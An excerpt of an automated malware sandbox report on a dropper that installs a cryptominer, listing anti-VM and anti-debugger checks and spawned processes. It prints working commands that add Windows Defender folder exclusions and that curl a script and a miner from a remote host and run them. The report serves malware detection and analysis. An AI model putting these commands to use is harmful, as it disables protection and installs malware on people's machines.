                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00402218 GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetComputerNameA,GetComputerNameA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,sprintf,printf,7_2_00402218
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeThread delayed: delay time: 60000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeThread delayed: delay time: 60000
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\services64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\services64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599854
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599716
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599534
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599285
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599127
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598988
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598850
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598734
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598625
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 598515
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599803
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599687
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599552
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599436
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599327
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599217
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 599108
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: axplong.exe, axplong.exe, 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                        Source: svchost64.exe, 00000095.00000002.2843997051.0000000000598000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914[1].exe.6.dr, Microsoft-Edge.exe.7.dr, loader_5879465914.exe.6.drBinary or memory string: IsVirtualMachine
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2766846263.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2950307615.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2577066128.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2843755674.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2436766433.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2673880736.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2358096287.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2400016250.00000000007BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914[1].exe.6.dr, Microsoft-Edge.exe.7.dr, loader_5879465914.exe.6.drBinary or memory string: CheckForVirtualMachine
                        Source: file.exe, 00000000.00000002.1763073628.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1789659705.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1789484442.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                        Source: miner2.0.exe, 00000055.00000002.2679277773.0000000000A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: curl.exe, 0000000A.00000003.2354085567.00000212B53C6000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000003.2618645292.000001DFDEF56000.00000004.00000020.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2793628082.000000001E4E4000.00000004.00000020.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2853167790.000000001DFCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Found API chain indicative of debugger detection
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_7-903
                        Hides threads from debuggers
                        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                        Potentially malicious time measurement code found
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CC01E6 Start: 04CC0289 End: 04CC01B20_2_04CC01E6
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CC0189 Start: 04CC0289 End: 04CC01B20_2_04CC0189
                        Tries to detect sandboxes and other dynamic analysis tools (window names)
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04CC0942 rdtsc 0_2_04CC0942
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00401B3F GetCurrentProcessId,CreateToolhelp32Snapshot,fwrite,Process32First,_stricmp,Process32Next,CloseHandle,CloseHandle,7_2_00401B3F
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C5645B mov eax, dword ptr fs:[00000030h]6_2_00C5645B
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C5A1C2 mov eax, dword ptr fs:[00000030h]6_2_00C5A1C2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,GetStartupInfoA,7_2_00401180
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00402D90 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,7_2_00402D90
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeCode function: 7_2_00401E9E puts,ShellExecuteExA,ShellExecuteExA,GetLastError,puts,printf,WaitForSingleObject,CloseHandle,7_2_00401E9E
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c Jump to behavior
